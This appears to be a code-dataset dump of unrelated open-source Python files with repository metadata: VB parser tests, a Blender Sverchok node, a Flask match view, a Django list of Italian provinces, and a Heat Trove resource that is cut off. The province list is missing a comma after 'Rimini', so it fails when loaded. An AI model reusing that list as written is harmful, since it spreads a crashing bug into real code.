# Range case
tests.append("""
Select Case x
Case "a" To "m"
z = 1
Case "n" To "z"
z = 20
End Select
""")
# Range case with Is and Like
tests.append("""
Select Case x
Case Is < "?", "a" To "m"
z = 1
Case "n" To "z", Is > 10, Is Like "*blah"
z = 20
End Select
""")
# Multiple Range case
tests.append("""
Select Case x
Case "a" To "m", "A" To "G", "K" To "P"
z = 1
Case "n" To "z", 10 To this.that(10,20)
z = 20
End Select
""")
# Empty case
tests.append("""
Select Case a
Case 10
Case 20
End Select
""")
# Case with comments
tests.append("""
Select Case x
' Here is a nasty comment
Case "one"
y = 1
Case "two"
y = 2
Case "three"
z = 3
End Select
""")
# << Parsing tests >> (49 of 61)
# Simple for
tests.append("""
For i = 0 To 1000
a = a + 1
Next i
""")
# Simple for
tests.append("""
For i=0 To 1000
a = a + 1
Next i
""")
# Empty for
tests.append("""
For i = 0 To 1000
Next i
""")
# Simple for with unnamed Next
tests.append("""
For i = 0 To 1000
a = a + 1
Next
""")
# For with step
tests.append("""
For i = 0 To 1000 Step 2
a = a + 1
Next i
""")
# For with exit
tests.append("""
For i = 0 To 1000
a = a + 1
Exit For
Next i
""")
# Nested for
tests.append("""
For i = 0 To 1000
a = a + 1
For j = 1 To i
b = b + j
Next j
Next i
""")
# Dotted names - what does this even mean?
tests.append("""
For me.you = 0 To 1000 Step 2
a = a + 1
Next me.you
""")
# << Parsing tests >> (50 of 61)
# Simple for
tests.append("""
For Each i In coll
a = a + 1
Next i
""")
# Empty for
tests.append("""
For Each i In coll
Next i
""")
# Simple for with unnamed Next
tests.append("""
For Each i In coll
a = a + 1
Next
""")
# For with exit
tests.append("""
For Each i In coll
a = a + 1
Exit For
Next i
""")
# Nested for
tests.append("""
For Each i In coll
a = a + 1
For Each j In coll
b = b + j
Next j
Next i
""")
# << Parsing tests >> (51 of 61)
# Simple while wend
tests.append("""
a = 0
While a < 10
g = 10
a = a + 1
Wend
""")
# Nested while wend
tests.append("""
a = 0
While a < 10
g = 10
a = a + 1
While b < 40
doit
Wend
Wend
""")
# Simple while wend with line numbers
tests.append("""
1: a = 0
2: While a < 10
3: g = 10
4: a = a + 1
5: Wend
""")
# << Parsing tests >> (52 of 61)
# Simple do while loop
tests.append("""
a = 0
Do While a < 10
g = 10
a = a + 1
Loop
""")
# Simple do while with exit
tests.append("""
a = 0
Do While a < 10
g = 10
a = a + 1
Exit Do
Loop
""")
# Nested do while loop
tests.append("""
a = 0
Do While a < 10
g = 10
a = a + 1
Do While b < 40
doit
Loop
Loop
""")
# << Parsing tests >> (53 of 61)
# Simple do loop
tests.append("""
a = 0
Do
g = 10
a = a + 1
Loop
""")
# Simple do with exit
tests.append("""
a = 0
Do
g = 10
a = a + 1
Exit Do
Loop
""")
# Nested do loop
tests.append("""
a = 0
Do
g = 10
a = a + 1
Do
doit
Loop
Loop
""")
# << Parsing tests >> (54 of 61)
# Simple do loop
tests.append("""
a = 0
Do
g = 10
a = a + 1
Loop While a < 10
""")
# Simple do with exit
tests.append("""
a = 0
Do
g = 10
a = a + 1
Exit Do
Loop While a <10
""")
# Nested do loop
tests.append("""
a = 0
Do
g = 10
a = a + 1
Do
doit
Loop While a <10
Loop While a< 10
""")
# << Parsing tests >> (55 of 61)
# Simple do loop
tests.append("""
a = 0
Do
g = 10
a = a + 1
Loop Until a < 10
""")
# Simple do with exit
tests.append("""
a = 0
Do
g = 10
a = a + 1
Exit Do
Loop Until a <10
""")
# Nested do loop
tests.append("""
a = 0
Do
g = 10
a = a + 1
Do
doit
Loop While a <10
Loop Until a< 10
""")
# << Parsing tests >> (56 of 61)
# Simple do loop
tests.append("""
a = 0
Do Until a < 10
g = 10
a = a + 1
Loop
""")
# Simple do with exit
tests.append("""
a = 0
Do Until a <10
g = 10
a = a + 1
Exit Do
Loop
""")
# Nested do loop
tests.append("""
a = 0
Do Until a< 10
g = 10
a = a + 1
Do While a <10
doit
Loop
Loop
""")
# << Parsing tests >> (57 of 61)
# simple type
tests.append("""
Type myType
A As Integer
B As String
C As MyClass.MyType
End Type
""")
# simple type with scope
tests.append("""
Public Type myType
A As Integer
B As String
C As MyClass.MyType
End Type
""")
tests.append("""
Private Type myType
A As Integer
B As String
C As MyClass.MyType
End Type
""")
# With a comment inside
tests.append("""
Private Type myType
A As Integer
B As String
' Here is a comment
C As MyClass.MyType
End Type
""")
# << Parsing tests >> (58 of 61)
# General with with just the structure
tests.append("""
With MyObject
a = 10
End With
""")
# General with with some assignments
tests.append("""
With MyObject
.value = 10
.other = "Hello"
End With
""")
# General with with some assignments and expressions
tests.append("""
With MyObject
.value = .other + 10
.other = "Hello" & .name
End With
""")
# Nested With
tests.append("""
With MyObject
a = 10
With .OtherObject
b = 20
End With
End With
""")
# General with with just the structure and labels
tests.append("""
1: With MyObject
2: a = 10
3: End With
""")
# Empty with
tests.append("""
With MyObject
End With
""")
# << Parsing tests >> (59 of 61)
# Simple header found at the top of most class files
tests.append("""
VERSION 1.0 CLASS
BEGIN
MultiUse = -1 'True
Persistable = 0 'NotPersistable
DataBindingBehavior = 0 'vbNone
DataSourceBehavior = 0 'vbNone
MTSTransactionMode = 0 'NotAnMTSObject
END
""")
# << Parsing tests >> (60 of 61)
# Simple enumeration
tests.append("""
Enum MyEnum
one
two
three
four
five
End Enum
""")
# Scoped enumeration
tests.append("""
Public Enum MyEnum
one
two
three
four
five
End Enum
""")
tests.append("""
Private Enum MyEnum
one
two
three
four
five
End Enum
""")
# Simple enumeration with comments
tests.append("""
Enum MyEnum ' yeah
one ' this
two ' is
three
four ' neat
five
End Enum
""")
# << Parsing tests >> (61 of 61)
failures = [
"If a = 10 Then d = 1 Else If k = 12 Then b = 12",
"If a = 10 Then d = 1 Else If k = 12 Then b = 12 Else g=123",
]
# -- end -- << Parsing tests >>
class ParsingTest(TestCase):
"""Holder class which gets built into a whole test case"""
def getTestMethod(vb):
"""Create a test method"""
def testMethod(self):
try:
buildParseTree(vb)
except VBParserError:
raise "Unable to parse ...\n%s" % vb
return testMethod
#
# Add tests to main test class
for idx in range(len(tests)):
setattr(ParsingTest, "test%d" % idx, getTestMethod(tests[idx]))
if __name__ == "__main__":
main()
|
reingart/vb2py
|
vb2py/test/testparser.py
|
Python
|
gpl-3.0
| 41,055
| 0.003898
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
import bpy
import mathutils
from sverchok.node_tree import SverchCustomTreeNode
from sverchok.data_structure import (matrixdef, Matrix_listing, Vector_generate)
class MatrixGenNode(bpy.types.Node, SverchCustomTreeNode):
''' MatrixGenerator '''
bl_idname = 'MatrixGenNode'
bl_label = 'Matrix in'
bl_icon = 'OUTLINER_OB_EMPTY'
def sv_init(self, context):
s = self.inputs.new('VerticesSocket', "Location")
s.use_prop = True
s = self.inputs.new('VerticesSocket', "Scale")
s.use_prop = True
s.prop = (1, 1 , 1)
s = self.inputs.new('VerticesSocket', "Rotation")
s.use_prop = True
s.prop = (0, 0, 1)
self.inputs.new('StringsSocket', "Angle")
self.outputs.new('MatrixSocket', "Matrix")
def process(self):
L,S,R,A = self.inputs
Ma = self.outputs[0]
if not Ma.is_linked:
return
loc = Vector_generate(L.sv_get())
scale = Vector_generate(S.sv_get())
rot = Vector_generate(R.sv_get())
rotA, angle = [[]], [[0.0]]
# ability to add vector & vector difference instead of only rotation values
if A.is_linked:
if A.links[0].from_socket.bl_idname == 'VerticesSocket':
rotA = Vector_generate(A.sv_get())
angle = [[]]
else:
angle = A.sv_get()
rotA = [[]]
max_l = max(len(loc[0]), len(scale[0]), len(rot[0]), len(angle[0]), len(rotA[0]))
orig = []
for l in range(max_l):
M = mathutils.Matrix()
orig.append(M)
matrixes_ = matrixdef(orig, loc, scale, rot, angle, rotA)
matrixes = Matrix_listing(matrixes_)
Ma.sv_set(matrixes)
def register():
bpy.utils.register_class(MatrixGenNode)
def unregister():
bpy.utils.unregister_class(MatrixGenNode)
if __name__ == '__main__':
register()
|
taxpon/sverchok
|
old_nodes/matrix_in.py
|
Python
|
gpl-3.0
| 2,720
| 0.003309
|
import html
import inflect
import titlecase
from flask import url_for
from shared.pd_exception import DoesNotExistException
from .. import APP, importing
from ..data import match
from ..view import View
@APP.route('/match/<int:match_id>/')
def show_match(match_id: int) -> str:
view = Match(match.get_match(match_id))
return view.page()
# pylint: disable=no-self-use,too-many-instance-attributes
class Match(View):
def __init__(self, viewed_match: match.Match) -> None:
super().__init__()
if not viewed_match:
raise DoesNotExistException()
self.match = viewed_match
self.id = viewed_match.id
self.comment = viewed_match.comment
self.format_name = viewed_match.format_name()
self.players_string = ' vs '.join([p.name for p in viewed_match.players])
self.players_string_safe = ' vs '.join([player_link(p.name) for p in viewed_match.players])
self.module_string = ', '.join([m.name for m in viewed_match.modules])
if not viewed_match.games:
self.no_games = True
return
self.game_one = viewed_match.games[0]
self.has_game_two = False
self.has_game_three = False
if len(viewed_match.games) > 1:
self.has_game_two = True
self.game_two = viewed_match.games[1]
if len(viewed_match.games) > 2:
self.has_game_three = True
self.game_three = viewed_match.games[2]
if viewed_match.has_unexpected_third_game is None:
importing.reimport(viewed_match)
self.has_unexpected_third_game = viewed_match.has_unexpected_third_game
if viewed_match.is_tournament is None:
importing.reimport(viewed_match)
self.is_tournament = viewed_match.is_tournament
def og_title(self) -> str:
return self.players_string
def og_url(self) -> str:
return url_for('show_match', match_id=self.id, _external=True)
def og_description(self) -> str:
p = inflect.engine()
fmt = titlecase.titlecase(p.a(self.format_name))
description = '{fmt} match.'.format(fmt=fmt)
return description
def player_link(name: str) -> str:
url = url_for('show_person', person=name)
return '<a href="{url}">{name}</a>'.format(url=html.escape(url), name=html.escape(name))
|
PennyDreadfulMTG/Penny-Dreadful-Discord-Bot
|
logsite/views/match_view.py
|
Python
|
gpl-3.0
| 2,353
| 0.002125
|
# -*- coding: utf-8 -*
PROVINCE_CHOICES = (
('AG', 'Agrigento'),
('AL', 'Alessandria'),
('AN', 'Ancona'),
('AO', 'Aosta'),
('AR', 'Arezzo'),
('AP', 'Ascoli Piceno'),
('AT', 'Asti'),
('AV', 'Avellino'),
('BA', 'Bari'),
# ('BT', 'Barletta-Andria-Trani'), # active starting from 2009
('BL', 'Belluno'),
('BN', 'Benevento'),
('BG', 'Bergamo'),
('BI', 'Biella'),
('BO', 'Bologna'),
('BZ', 'Bolzano/Bozen'),
('BS', 'Brescia'),
('BR', 'Brindisi'),
('CA', 'Cagliari'),
('CL', 'Caltanissetta'),
('CB', 'Campobasso'),
('CI', 'Carbonia-Iglesias'),
('CE', 'Caserta'),
('CT', 'Catania'),
('CZ', 'Catanzaro'),
('CH', 'Chieti'),
('CO', 'Como'),
('CS', 'Cosenza'),
('CR', 'Cremona'),
('KR', 'Crotone'),
('CN', 'Cuneo'),
('EN', 'Enna'),
# ('FM', 'Fermo'), # active starting from 2009
('FE', 'Ferrara'),
('FI', 'Firenze'),
('FG', 'Foggia'),
('FC', 'Forlì-Cesena'),
('FR', 'Frosinone'),
('GE', 'Genova'),
('GO', 'Gorizia'),
('GR', 'Grosseto'),
('IM', 'Imperia'),
('IS', 'Isernia'),
('SP', 'La Spezia'),
('AQ', u'L’Acquila'),
('LT', 'Latina'),
('LE', 'Lecce'),
('LC', 'Lecco'),
('LI', 'Livorno'),
('LO', 'Lodi'),
('LU', 'Lucca'),
('MC', 'Macerata'),
('MN', 'Mantova'),
('MS', 'Massa-Carrara'),
('MT', 'Matera'),
('VS', 'Medio Campidano'),
('ME', 'Messina'),
('MI', 'Milano'),
('MO', 'Modena'),
# ('MB', 'Monza e Brianza'), # active starting from 2009
('NA', 'Napoli'),
('NO', 'Novara'),
('NU', 'Nuoro'),
('OG', 'Ogliastra'),
('OT', 'Olbia-Tempio'),
('OR', 'Oristano'),
('PD', 'Padova'),
('PA', 'Palermo'),
('PR', 'Parma'),
('PV', 'Pavia'),
('PG', 'Perugia'),
('PU', 'Pesaro e Urbino'),
('PE', 'Pescara'),
('PC', 'Piacenza'),
('PI', 'Pisa'),
('PT', 'Pistoia'),
('PN', 'Pordenone'),
('PZ', 'Potenza'),
('PO', 'Prato'),
('RG', 'Ragusa'),
('RA', 'Ravenna'),
('RC', 'Reggio Calabria'),
('RE', 'Reggio Emilia'),
('RI', 'Rieti'),
('RN', 'Rimini')
('RM', 'Roma'),
('RO', 'Rovigo'),
('SA', 'Salerno'),
('SS', 'Sassari'),
('SV', 'Savona'),
('SI', 'Siena'),
('SR', 'Siracusa'),
('SO', 'Sondrio'),
('TA', 'Taranto'),
('TE', 'Teramo'),
('TR', 'Terni'),
('TO', 'Torino'),
('TP', 'Trapani'),
('TN', 'Trento'),
('TV', 'Treviso'),
('TS', 'Trieste'),
('UD', 'Udine'),
('VA', 'Varese'),
('VE', 'Venezia'),
('VB', 'Verbano Cusio Ossola'),
('VC', 'Vercelli'),
('VR', 'Verona'),
('VV', 'Vibo Valentia'),
('VI', 'Vicenza'),
('VT', 'Viterbo'),
)
|
jonaustin/advisoryscan
|
django/django/contrib/localflavor/it/it_province.py
|
Python
|
mit
| 2,747
| 0.001458
|
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log as logging
from heat.common import exception
from heat.common.i18n import _
from heat.engine import attributes
from heat.engine import constraints
from heat.engine import properties
from heat.engine import resource
from heat.engine import support
from heat.engine import translation
LOG = logging.getLogger(__name__)
class Instance(resource.Resource):
"""OpenStack cloud database instance resource.
Trove is Database as a Service for OpenStack. It's designed to run entirely
on OpenStack, with the goal of allowing users to quickly and easily utilize
the features of a relational or non-relational database without the burden
of handling complex administrative tasks.
"""
support_status = support.SupportStatus(version='2014.1')
TROVE_STATUS = (
ERROR, FAILED, ACTIVE,
) = (
'ERROR', 'FAILED', 'ACTIVE',
)
TROVE_STATUS_REASON = {
FAILED: _('The database instance was created, but heat failed to set '
'up the datastore. If a database instance is in the FAILED '
'state, it should be deleted and a new one should be '
'created.'),
ERROR: _('The last operation for the database instance failed due to '
'an error.'),
}
BAD_STATUSES = (ERROR, FAILED)
PROPERTIES = (
NAME, FLAVOR, SIZE, DATABASES, USERS, AVAILABILITY_ZONE,
RESTORE_POINT, DATASTORE_TYPE, DATASTORE_VERSION, NICS,
REPLICA_OF, REPLICA_COUNT,
) = (
'name', 'flavor', 'size', 'databases', 'users', 'availability_zone',
'restore_point', 'datastore_type', 'datastore_version', 'networks',
'replica_of', 'replica_count'
)
_DATABASE_KEYS = (
DATABASE_CHARACTER_SET, DATABASE_COLLATE, DATABASE_NAME,
) = (
'character_set', 'collate', 'name',
)
_USER_KEYS = (
USER_NAME, USER_PASSWORD, USER_HOST, USER_DATABASES,
) = (
'name', 'password', 'host', 'databases',
)
_NICS_KEYS = (
NET, PORT, V4_FIXED_IP
) = (
'network', 'port', 'fixed_ip'
)
ATTRIBUTES = (
HOSTNAME, HREF,
) = (
'hostname', 'href',
)
properties_schema = {
NAME: properties.Schema(
properties.Schema.STRING,
_('Name of the DB instance to create.'),
update_allowed=True,
constraints=[
constraints.Length(max=255),
]
),
FLAVOR: properties.Schema(
properties.Schema.STRING,
_('Reference to a flavor for creating DB instance.'),
required=True,
update_allowed=True,
constraints=[
constraints.CustomConstraint('trove.flavor')
]
),
DATASTORE_TYPE: properties.Schema(
properties.Schema.STRING,
_("Name of registered datastore type."),
constraints=[
constraints.Length(max=255)
]
),
DATASTORE_VERSION: properties.Schema(
properties.Schema.STRING,
_("Name of the registered datastore version. "
"It must exist for provided datastore type. "
"Defaults to using single active version. "
"If several active versions exist for provided datastore type, "
"explicit value for this parameter must be specified."),
constraints=[constraints.Length(max=255)]
),
SIZE: properties.Schema(
properties.Schema.INTEGER,
_('Database volume size in GB.'),
required=True,
update_allowed=True,
constraints=[
constraints.Range(1, 150),
]
),
NICS: properties.Schema(
properties.Schema.LIST,
_("List of network interfaces to create on instance."),
default=[],
schema=properties.Schema(
properties.Schema.MAP,
schema={
NET: properties.Schema(
properties.Schema.STRING,
_('Name or UUID of the network to attach this NIC to. '
'Either %(port)s or %(net)s must be specified.') % {
'port': PORT, 'net': NET},
constraints=[
constraints.CustomConstraint('neutron.network')
]
),
PORT: properties.Schema(
properties.Schema.STRING,
_('Name or UUID of Neutron port to attach this '
'NIC to. '
'Either %(port)s or %(net)s must be specified.') % {
'port': PORT, 'net': NET},
constraints=[
constraints.CustomConstraint('neutron.port')
],
),
V4_FIXED_IP: properties.Schema(
properties.Schema.STRING,
_('Fixed IPv4 address for this NIC.'),
constraints=[
constraints.CustomConstraint('ip_addr')
]
),
},
),
),
DATABASES: properties.Schema(
properties.Schema.LIST,
_('List of databases to be created on DB instance creation.'),
default=[],
update_allowed=True,
schema=properties.Schema(
properties.Schema.MAP,
schema={
DATABASE_CHARACTER_SET: properties.Schema(
properties.Schema.STRING,
_('Set of symbols and encodings.'),
default='utf8'
),
DATABASE_COLLATE: properties.Schema(
properties.Schema.STRING,
_('Set of rules for comparing characters in a '
'character set.'),
default='utf8_general_ci'
),
DATABASE_NAME: properties.Schema(
properties.Schema.STRING,
_('Specifies database names for creating '
'databases on instance creation.'),
required=True,
constraints=[
constraints.Length(max=64),
constraints.AllowedPattern(r'[a-zA-Z0-9_\-]+'
r'[a-zA-Z0-9_@?#\s\-]*'
r'[a-zA-Z0-9_\-]+'),
]
),
},
)
),
USERS: properties.Schema(
properties.Schema.LIST,
_('List of users to be created on DB instance creation.'),
default=[],
update_allowed=True,
schema=properties.Schema(
properties.Schema.MAP,
schema={
USER_NAME: properties.Schema(
properties.Schema.STRING,
_('User name to create a user on instance '
'creation.'),
required=True,
update_allowed=True,
constraints=[
constraints.Length(max=16),
constraints.AllowedPattern(r'[a-zA-Z0-9_]+'
r'[a-zA-Z0-9_@?#\s]*'
r'[a-zA-Z0-9_]+'),
]
),
USER_PASSWORD: properties.Schema(
properties.Schema.STRING,
_('Password for those users on instance '
'creation.'),
required=True,
update_allowed=True,
constraints=[
constraints.AllowedPattern(r'[a-zA-Z0-9_]+'
r'[a-zA-Z0-9_@?#\s]*'
r'[a-zA-Z0-9_]+'),
]
),
USER_HOST: properties.Schema(
properties.Schema.STRING,
_('The host from which a user is allowed to '
'connect to the database.'),
default='%',
update_allowed=True
),
USER_DATABASES: properties.Schema(
properties.Schema.LIST,
_('Names of databases that those users can '
'access on instance creation.'),
schema=properties.Schema(
properties.Schema.STRING,
),
required=True,
update_allowed=True,
constraints=[
constraints.Length(min=1),
]
),
},
)
),
AVAILABILITY_ZONE: properties.Schema(
properties.Schema.STRING,
_('Name of the availability zone for DB instance.')
),
RESTORE_POINT: properties.Schema(
properties.Schema.STRING,
_('DB instance restore point.')
),
REPLICA_OF: properties.Schema(
properties.Schema.STRING,
_('Identifier of the source instance to replicate.'),
support_status=support.SupportStatus(version='5.0.0')
),
REPLICA_COUNT: properties.Schema(
properties.Schema.INTEGER,
_('The number of replicas to be created.'),
support_status=support.SupportStatus(version='5.0.0')
),
}
attributes_schema = {
HOSTNAME: attributes.Schema(
_("Hostname of the instance."),
type=attributes.Schema.STRING
),
HREF: attributes.Schema(
_("Api endpoint reference of the instance."),
type=attributes.Schema.STRING
),
}
default_client_name = 'trove'
entity = 'instances'
def translation_rules(self, properties):
return [
translation.TranslationRule(
properties,
translation.TranslationRule.RESOLVE,
[self.FLAVOR],
client_plugin=self.client_plugin(),
finder='find_flavor_by_name_or_id'
)
]
def __init__(self, name, json_snippet, stack):
super(Instance, self).__init__(name, json_snippet, stack)
self._href = None
self._dbinstance = None
@property
def dbinstance(self):
"""Get the trove dbinstance."""
if not self._dbinstance and self.resource_id:
self._dbinstance = self.client().instances.get(self.resource_id)
return self._dbinstance
def _dbinstance_name(self):
name = self.properties[self.NAME]
if name:
return name
return self.physical_resource_name()
def handle_create(self):
"""Create cloud database instance."""
self.flavor = self.properties[self.FLAVOR]
self.volume = {'size': self.properties[self.SIZE]}
self.databases = self.properties[self.DATABASES]
self.users = self.properties[self.USERS]
restore_point = self.properties[self.RESTORE_POINT]
if restore_point:
restore_point = {"backupRef": restore_point}
zone = self.properties[self.AVAILABILITY_ZONE]
self.datastore_type = self.properties[self.DATASTORE_TYPE]
self.datastore_version = self.properties[self.DATASTORE_VERSION]
replica_of = self.properties[self.REPLICA_OF]
replica_count = self.properties[self.REPLICA_COUNT]
# convert user databases to format required for troveclient.
# that is, list of database dictionaries
for user in self.users:
dbs = [{'name': db} for db in user.get(self.USER_DATABASES, [])]
user[self.USER_DATABASES] = dbs
# convert networks to format required by troveclient
nics = []
for nic in self.properties[self.NICS]:
nic_dict = {}
net = nic.get(self.NET)
port = nic.get(self.PORT)
if net or port:
neutron = self.client_plugin('neutron')
if net:
net_id = neutron.find_resourceid_by_name_or_id(
neutron.RES_TYPE_NETWORK,
net)
nic_dict['net-id'] = net_id
if port:
port_id = neutron.find_resourceid_by_name_or_id(
neutron.RES_TYPE_PORT,
port)
nic_dict['port-id'] = port_id
ip = nic.get(self.V4_FIXED_IP)
if ip:
nic_dict['v4-fixed-ip'] = ip
nics.append(nic_dict)
# create DB instance
instance = self.client().instances.create(
self._dbinstance_name(),
self.flavor,
volume=self.volume,
databases=self.databases,
users=self.users,
restorePoint=restore_point,
availability_zone=zone,
datastore=self.datastore_type,
datastore_version=self.datastore_version,
nics=nics,
replica_of=replica_of,
replica_count=replica_count)
self.resource_id_set(instance.id)
return instance.id
def _refresh_instance(self, instance_id):
try:
instance = self.client().instances.get(instance_id)
return instance
except Exception as exc:
if self.client_plugin().is_over_limit(exc):
LOG.warning("Stack %(name)s (%(id)s) received an "
"OverLimit response during instance.get():"
" %(exception)s",
{'name': self.stack.name,
'id': self.stack.id,
'exception': exc})
return None
else:
raise
def check_create_complete(self, instance_id):
"""Check if cloud DB instance creation is complete."""
instance = self._refresh_instance(instance_id) # refresh attributes
if instance is None:
return False
if instance.status in self.BAD_STATUSES:
raise exception.ResourceInError(
resource_status=instance.status,
status_reason=self.TROVE_STATUS_REASON.get(instance.status,
_("Unknown")))
if instance.status != self.ACTIVE:
return False
LOG.info("Database instance %(database)s created "
"(flavor:%(flavor)s, volume:%(volume)s, "
"datastore:%(datastore_type)s, "
"datastore_version:%(datastore_version)s)",
{'database': self._dbinstance_name(),
'flavor': self.flavor,
'volume': self.volume,
'datastore_type': self.datastore_type,
'datastore_version': self.datastore_version})
return True
def handle_check(self):
instance = self.client().instances.get(self.resource_id)
status = instance.status
checks = [
{'attr': 'status', 'expected': self.ACTIVE, 'current': status},
]
self._verify_check_conditions(checks)
def handle_update(self, json_snippet, tmpl_diff, prop_diff):
updates = {}
if prop_diff:
instance = self.client().instances.get(self.resource_id)
if self.NAME in prop_diff:
updates.update({self.NAME: prop_diff[self.NAME]})
if self.FLAVOR in prop_diff:
flv = prop_diff[self.FLAVOR]
updates.update({self.FLAVOR: flv})
if self.SIZE in prop_diff:
updates.update({self.SIZE: prop_diff[self.SIZE]})
if self.DATABASES in prop_diff:
current = [d.name
for d in self.client().databases.list(instance)]
desired = [d[self.DATABASE_NAME]
for d in prop_diff[self.DATABASES]]
for db in prop_diff[self.DATABASES]:
dbname = db[self.DATABASE_NAME]
if dbname not in current:
db['ACTION'] = self.CREATE
for dbname in current:
if dbname not in desired:
deleted = {self.DATABASE_NAME: dbname,
'ACTION': self.DELETE}
prop_diff[self.DATABASES].append(deleted)
updates.update({self.DATABASES: prop_diff[self.DATABASES]})
if self.USERS in prop_diff:
current = [u.name
for u in self.client().users.list(instance)]
desired = [u[self.USER_NAME] for u in prop_diff[self.USERS]]
for usr in prop_diff[self.USERS]:
if usr[self.USER_NAME] not in current:
usr['ACTION'] = self.CREATE
for usr in current:
if usr not in desired:
prop_diff[self.USERS].append({self.USER_NAME: usr,
'ACTION': self.DELETE})
updates.update({self.USERS: prop_diff[self.USERS]})
return updates
def check_update_complete(self, updates):
instance = self.client().instances.get(self.resource_id)
if instance.status in self.BAD_STATUSES:
raise exception.ResourceInError(
resource_status=instance.status,
status_reason=self.TROVE_STATUS_REASON.get(instance.status,
_("Unknown")))
if updates:
if instance.status != self.ACTIVE:
dmsg = ("Instance is in status %(now)s. Waiting on status"
" %(stat)s")
LOG.debug(dmsg % {"now": instance.status,
"stat": self.ACTIVE})
return False
try:
return (
self._update_name(instance, updates.get(self.NAME)) and
self._update_flavor(instance, updates.get(self.FLAVOR)) and
self._update_size(instance, updates.get(self.SIZE)) and
self._update_databases(instance,
updates.get(self.DATABASES)) and
self._update_users(instance, updates.get(self.USERS))
)
except Exception as exc:
if self.client_plugin().is_client_exception(exc):
# the instance could have updated between the time
# we retrieve it and try to update it so check again
if self.client_plugin().is_over_limit(exc):
LOG.debug("API rate limit: %(ex)s. Retrying.",
{'ex': str(exc)})
return False
if "No change was requested" in str(exc):
LOG.warning("Unexpected instance state change "
"during update. Retrying.")
return False
raise
return True
def _update_name(self, instance, name):
if name and instance.name != name:
self.client().instances.edit(instance, name=name)
return False
return True
def _update_flavor(self, instance, new_flavor):
if new_flavor:
current_flav = str(instance.flavor['id'])
new_flav = str(new_flavor)
if new_flav != current_flav:
dmsg = "Resizing instance flavor from %(old)s to %(new)s"
LOG.debug(dmsg % {"old": current_flav, "new": new_flav})
self.client().instances.resize_instance(instance, new_flavor)
return False
return True
def _update_size(self, instance, new_size):
if new_size and instance.volume['size'] != new_size:
dmsg = "Resizing instance storage from %(old)s to %(new)s"
LOG.debug(dmsg % {"old": instance.volume['size'],
"new": new_size})
self.client().instances.resize_volume(instance, new_size)
return False
return True
def _update_databases(self, instance, databases):
if databases:
for db in databases:
if db.get("ACTION") == self.CREATE:
db.pop("ACTION", None)
dmsg = "Adding new database %(db)s to instance"
LOG.debug(dmsg % {"db": db})
self.client().databases.create(instance, [db])
elif db.get("ACTION") == self.DELETE:
dmsg = ("Deleting existing database %(db)s from "
"instance")
LOG.debug(dmsg % {"db": db['name']})
self.client().databases.delete(instance, db['name'])
return True
def _update_users(self, instance, users):
if users:
for usr in users:
dbs = [{'name': db} for db in usr.get(self.USER_DATABASES,
[])]
usr[self.USER_DATABASES] = dbs
if usr.get("ACTION") == self.CREATE:
usr.pop("ACTION", None)
dmsg = "Adding new user %(u)s to instance"
LOG.debug(dmsg % {"u": usr})
self.client().users.create(instance, [usr])
elif usr.get("ACTION") == self.DELETE:
dmsg = ("Deleting existing user %(u)s from "
"instance")
LOG.debug(dmsg % {"u": usr['name']})
self.client().users.delete(instance, usr['name'])
else:
newattrs = {}
if usr.get(self.USER_HOST):
newattrs[self.USER_HOST] = usr[self.USER_HOST]
if usr.get(self.USER_PASSWORD):
newattrs[self.USER_PASSWORD] = usr[self.USER_PASSWORD]
if newattrs:
self.client().users.update_attributes(
instance,
usr['name'], newuserattr=newattrs,
hostname=instance.hostname)
current = self.client().users.get(instance,
usr[self.USER_NAME])
dbs = [db['name'] for db in current.databases]
desired = [db['name'] for db in
usr.get(self.USER_DATABASES, [])]
grants = [db for db in desired if db not in dbs]
revokes = [db for db in dbs if db not in desired]
if grants:
self.client().users.grant(instance,
usr[self.USER_NAME],
grants)
if revokes:
self.client().users.revoke(instance,
usr[self.USER_NAME],
revokes)
return True
def parse_live_resource_data(self, resource_properties, resource_data):
"""A method to parse live resource data to update current resource.
NOTE: cannot update users from live resource data in case of
impossibility to get required user password.
"""
dbs = [d.name for d in self.client().databases.list(self.resource_id)]
dbs_reality = []
for resource_db in resource_properties[self.DATABASES]:
if resource_db[self.DATABASE_NAME] in dbs:
dbs_reality.append(resource_db)
dbs.remove(resource_db[self.DATABASE_NAME])
# cannot get any property for databases except for name, so update
# resource with name
dbs_reality.extend([{self.DATABASE_NAME: db} for db in dbs])
result = {self.NAME: resource_data.get('name'),
self.DATABASES: dbs_reality}
if resource_data.get('flavor') is not None:
result[self.FLAVOR] = resource_data['flavor'].get('id')
if resource_data.get('volume') is not None:
result[self.SIZE] = resource_data['volume']['size']
return result
def handle_delete(self):
"""Delete a cloud database instance."""
if not self.resource_id:
return
try:
instance = self.client().instances.get(self.resource_id)
except Exception as ex:
self.client_plugin().ignore_not_found(ex)
else:
instance.delete()
return instance.id
def check_delete_complete(self, instance_id):
"""Check for completion of cloud DB instance deletion."""
if not instance_id:
return True
try:
# For some time trove instance may continue to live
self._refresh_instance(instance_id)
except Exception as ex:
self.client_plugin().ignore_not_found(ex)
return True
return False
def validate(self):
"""Validate any of the provided params."""
res = super(Instance, self).validate()
if res:
return res
datastore_type = self.properties[self.DATASTORE_TYPE]
datastore_version = self.properties[self.DATASTORE_VERSION]
self.client_plugin().validate_datastore(
datastore_type, datastore_version,
self.DATASTORE_TYPE, self.DATASTORE_VERSION)
# check validity of user and databases
users = self.properties[self.USERS]
if users:
databases = self.properties[self.DATABASES]
if not databases:
msg = _('Databases property is required if users property '
'is provided for resource %s.') % self.name
raise exception.StackValidationFailed(message=msg)
db_names = set([db[self.DATABASE_NAME] for db in databases])
for user in users:
missing_db = [db_name for db_name in user[self.USER_DATABASES]
if db_name not in db_names]
if missing_db:
